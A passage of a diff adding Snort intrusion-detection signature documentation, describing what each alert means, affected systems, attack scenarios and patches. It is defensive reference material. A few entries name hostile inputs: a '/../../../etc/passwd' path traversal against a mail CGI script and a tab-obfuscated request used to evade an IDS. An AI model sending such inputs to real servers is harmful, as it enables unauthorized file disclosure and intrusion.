+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_nchar
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/619.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+619
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000364.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000364
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "admin.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "admin.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1756.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1756
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2213.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2213
+
+--
+Summary:
+This event is generated when an attempt is made to access mailfile.cgi on an internal web server. This may indicate an attempt to exploit a file disclosure vulnerability in Oatmeal Studios Mail File 1.10.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+Mail File 1.10 is a Perl script that allows web site visitors to email files to any user using an online form. It contains a vulnerability where an attacker can craft a URL with an arbitrary file name in the "filename" argument. If the file exists on the server, it is emailed to the address that the attacker specifies in the URL. 
+
+--
+Affected Systems:
+Systems running Oatmeal Studios Mail File 1.10.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to a vulnerable web server with /../../../etc/passwd as the filename argument. If the web server's password file exists at that location, it is sent to the email address specified in the URL.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses mailfile.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable mailfile.cgi.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1807
+
+--
--- /dev/null
+++ b/doc/signatures/3385.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3385
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1268.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+1268
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) pcnfsd is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port pcnfsd is using.  Attackers can also learn what versions of the pcnfsd protocol are accepted by pcnfsd.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as pcnfsd run.  The pcnfsd RPC service handles printing and authentication over the network.  A vulnerability exists because of improper argument checking that allows execution of arbitrary commands with root privileges. 
+
+--
+Affected Systems:
+BSDI BSD/OS 2.1
+HP HP-UX 10.1, 10.10, 10.20, 11.0
+IBM AIX 3.2, 4.0, 4.1, 4.2
+SCO Open Server 5.0
+SCO Unixware 2.0, 2.0.3, 2.1
+SGI IRIX 6.5, 6.5.1 - 6.5.16 
+Sun Solaris 2.4, 2.5
+Sun SunOS 4.1, 4.1.1 - 4.1.4
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where pcnfsd runs.  This may be a precursor to accessing pcnfsd.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access pcnfsd, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for pcnfsd, not probes of the pcnfsd service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the pcnfsd service itself. An attacker may attempt to go directly to the pcnfsd port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/5378
+
+CERT
+http://www.cert.org/advisories/CA-1996-08.html
+
+Arachnids 
+http://www.whitehats.com/info/IDS22
+
+
+--
--- /dev/null
+++ b/doc/signatures/2692.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2692
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure verify_queue_types
+. This procedure is included in
+sys.dbms_aqadm_sys.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3119.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3119
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1523.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1523
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2173.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2173
+
+
+--
+Summary:
+This event is generated when a possible outgoing virus is detected. 
+
+--
+Impact:
+Informational event. An virus on an infected host may be attempting to 
+propogate.
+
+--
+Detailed Information:
+This event indicates that an outgoing email message possibly containing 
+a virus has been detected.
+
+This rule generates an event when a filename extension commonly used by 
+viruses is detected.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+This is indicative of a virus infection.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A legitimate attachment to an email may generate this event.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of virus infection.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/122-8.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-8
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+filtered distributed portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/1382.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+--
+Sid:
+1382
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known root
+exploit for Ettercap Network Sniffer (Version <= 0.6.2)
+
+--
+Impact:
+Remote attacker is able to gain root shell on host running ettercap.
+
+--
+Detailed Information:
+A buffer overflow in the parsing of IRC traffic for 'nick' passwords 
+enables a remote attacker to execute code of their choice as root on 
+the compromised host.  This is as a result of an unchecked string 
+copy of the captured password in the packet into the buffer used to 
+store all retrieved passwords.  The same or very similar overlows exist 
+for other string matches within this section of code in this and previous 
+versions of ettercap. 
+
+The exploit released by GOBBLES listens on port 0x8000 and provides a
+shell for the attacker.  Since ettercap is generaly run as root in order
+to have access to a promiscuous network interface, the shell will have
+uid=0 (root).
+--
+Attack Scenarios:
+Ettercap is likely to be deployed in 'sensitive' parts of the network
+where a network administrator is analysing passing traffic.  A
+compromise of a host in such a position will not only reveal any
+passwords already captured by ettercap to the attacker, but gives the
+attacker ample opportunity to analyse passing network traffic for
+further useful information.  The host will quite likely be used as a base for
+other attacks.  Ettercap may also be installed on a compromised host for
+the purpose of monitoring or modifying traffic on the hosts network.
+
+--
+Ease of Attack:
+Simple - exploit code pubished by 'GOBBLES' on
+vuln-dev - original posting can be seen here : 
+http://online.securityfocus.com/archive/82/245128
+
+--
+False Positives:
+Unlikely as an 'IDENTIFY' message should not be more than 200 bytes in normal usage.
+
+--
+False Negatives:
+Although the rule is good match for the posted exploit - there are
+several other strings which would match in the vulnerable section of
+code.  A better match might be obtained by specifying 'IDENTIFY ' with
+the datagram size (dsize) greater than 200, although this may introduce more false positives. 
+
+--
+Corrective Action:
+Upgrade to ettercap 0.6.3 or greater
+
+--
+Contributors: 
+Snort documentation contributed by Mark Vevers	Initial Research
+Snort documentation contributed by Josh Gray	Edits
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Attrition:
+http://www.attrition.org/security/advisory/gobbles/GOBBLES-12.txt
+
+Security Focus archive:
+http://online.securityfocus.com/archive/82/245128
+
+-- 
+
+--
--- /dev/null
+++ b/doc/signatures/1087.txt
@@ -0,0 +1,63 @@
+Rule:  
+
+Sid:
+1087
+
+--
+
+Summary:
+This event is generated when an attempt is made to evade an IDS in a 
+possible web attack by obfuscating the request with tabs.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+Some web servers (e.g., some versions of Apache) will interpret tabs
+as spaces in web requests.  This is used by some tools (e.g., Whisker)
+in an attempt to evade IDS systems.
+
+--
+Affected Systems:
+	All systems running a web server
+
+--
+Attack Scenarios:
+An attacker runs an automated tool, like Whisker, against a web server, or
+runs an attack by hand with a URL similar to:  GET<tab>/<tab>HTML/1.0
+
+--
+Ease of Attack:
+Simple. Automated tools are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to see if a web request was being made. Try to
+determine what the requested item was (e.g., a file or CGI), and determine
+from the web server's configuration whether it was a threat or not
+(e.g., whether the requested file or CGI even existed or was vulnerable).
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+Arachnids:  415
+URL:  www.wiretrip.net/rfp/pages/whitepapers/whiskerids.html
+
+--
--- /dev/null
+++ b/doc/signatures/302.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 301
+
+--
+Summary:
+This event is generated when an attempt is made to escalate privileges remotely using a vulnerability in LPRng on RedHat systems.
+
+--
+Impact:
+System compromize presenting the attacker with escalated system privileges .
+
+--
+Detailed Information:
+LPRng is an implementation of the Berkeley lpr print spooling protocol. Some versions are vulnerable to a format-string attack that takes advantage of a bug in the syslog() wrapper. Successfull exploitation may present a remote attacker with the ability to execute arbitrary code using the privileges of the LPD daemon owner (typically root).
+
+Arbitrary addresses in the lpd process address space can be overwritten by sending specially crafted packets to the LPRng daemon listening on port 515 to execute arbitrary code or generate a segmentation violation.
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to LPRng port 515 from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1712
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0917
+
+--
--- /dev/null
+++ b/doc/signatures/100000166.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000166
+
+-- 
+Summary: 
+This event is generated when a command is sent to an Oracle isqlplus instance 
+which contains a command to halt the Oracle TNS listener service.
+
+--
+Impact:
+Vulnerable Oracle servers may shut down their TNS listener service upon receipt 
+of this command, making the database unavailable for normal use until it is 
+restarted.
+
+--
+Detailed Information:
+iSQLPlus is a web interface to the Oracle SQLPlus system. A wide range of 
+commands may be sent to an Oracle server via this interface, including 
+administrative commands. If a request is sent which contains a command to halt 
+the TNS listener service, vulnerable versions of Oracle will execute the 
+command, halting the service and denying service to legitimate users until the 
+service is restarted.
+
+--
+Affected Systems:
+Oracle 9i Standard Edition 9.0.2.4
+Oracle 9i Personal Edition 9.0.2.4
+Oracle 9i Enterprise Edition 9.0.2.4
+
+--
+Attack Scenarios:
+A web browser may be used to exploit this vulnerability.
+
+--
+Ease of Attack:
+Simple, as a publicly available exploit exists which may be executed via a web 
+browser.
+
+--
+False Positives:
+Any time an authorized administrator chooses to shut down the TNS listener 
+service via the iSQLPlus interface.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the Oracle Critical Patch Update from July 2005, available at 
+http://www.oracle.com/technology/deploy/security/pdf/cpujul2005.html.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/1651.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1651
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/487.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+
+Sid:
+486
+
+--
+
+Summary:
+This event is generated when an ICMP destination unreachable
+(Communication with Destination Host is Administratively Prohibited)
+datagram is detected on the network.  
+
+--
+
+Impact:
+This message is generated when a datagram failed to traverse the
+network.  This could be an indication of routing or network problems.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large
+numbers of these messages on the network could indication routing
+problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None known.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None known.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+This rule detects informational network information, so no corrective
+action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None.
+
+
+--
--- /dev/null
+++ b/doc/signatures/3079.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+3079
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with Microsoft's processing of an animated cursor
+file.
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user downloading the
+malicious file.
+
+--
+Detailed Information:
+A vulnerability exists in the way the Microsoft Windows LoadImage API validates
+animated cursor (ANI) files. An invalid length associated with a structure
+supporting the properties of the animated cursor can cause a buffer overflow
+and the subsequent execution of arbirary code in the context of the current user.
+
+--
+Affected Systems:
+	Windows 98, ME, NT, 2000, XP (not SP2), and Server 2003
+
+--
+Attack Scenarios:
+An attacker can entice a user to download a malicious animated cursor
+file, causing a buffer overflow and the subsequent execution of arbitrary
+code on the vulnerable client.
+
+--
+Ease of Attack:
+Simple.  Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+In order to avoid potential evasion techniques, http_inspect should be
+configured with "flow_depth 0" so that all HTTP server response traffic is
+inspected.
+
+WARNING
+Setting flow_depth 0 will cause performance problems in some situations.
+WARNING
+
+--
+Corrective Action:
+Apply the patch(s) discussed in Microsoft bulletin MS05-002.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Microsoft Technet:
+http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/3256.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3256
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2405.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2405
+
+--
+Summary:
+This event is generated when an attempt is made to access the file "phptest.php".
+BadBlue Personal Edition 2.4 servers could disclose confidential
+information on the software configuration towards an attacker.
+
+--
+Impact:
+Information gathering.
+This signature is usually indicative of a reconaissance probe.
+Succesful exploitation would provide the originator of the attack with the
+installation path of the software.
+
+--
+Detailed Information:
+Web servers running BadBlue Personal Edition 2.4, a
+personal file sharing server, are vulnerable to a path disclosure attack.
+When a client requests the phptest.php file from such a server, the source
+of the HTTP reply page contains the installation path of the software.
+This path can be used as information for further attacks.
+
+--
+Affected Systems:
+	BadBlue Personal Edition 2.4
+
+--
+Attack Scenarios:
+During the reconaissance phase, an attacker could obtain the installation 
+path of the BadBlue server.  This can become valuable information during 
+the later execution of directory traversal or buffer overflow attacks.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+While not a true false positive, many PHP installation howtos advise the 
+creation of a small file "phptest.php" which contains a call for the 
